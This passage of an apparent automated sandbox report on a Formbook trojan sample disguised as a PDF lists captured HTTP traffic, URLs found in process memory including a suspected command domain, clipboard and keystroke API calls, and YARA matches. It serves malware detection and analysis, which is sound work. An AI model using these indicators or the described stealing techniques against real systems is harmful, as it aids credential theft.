6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Kevin-torkelson.info
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mandemj.top
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mandemj.top/to69/
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.00000000057D4000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.0000000002B84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020F04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdl32.exe, 0000000C.00000003.1967966189.000000000809C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,6_2_0046DC80
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,6_2_0044C37A
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
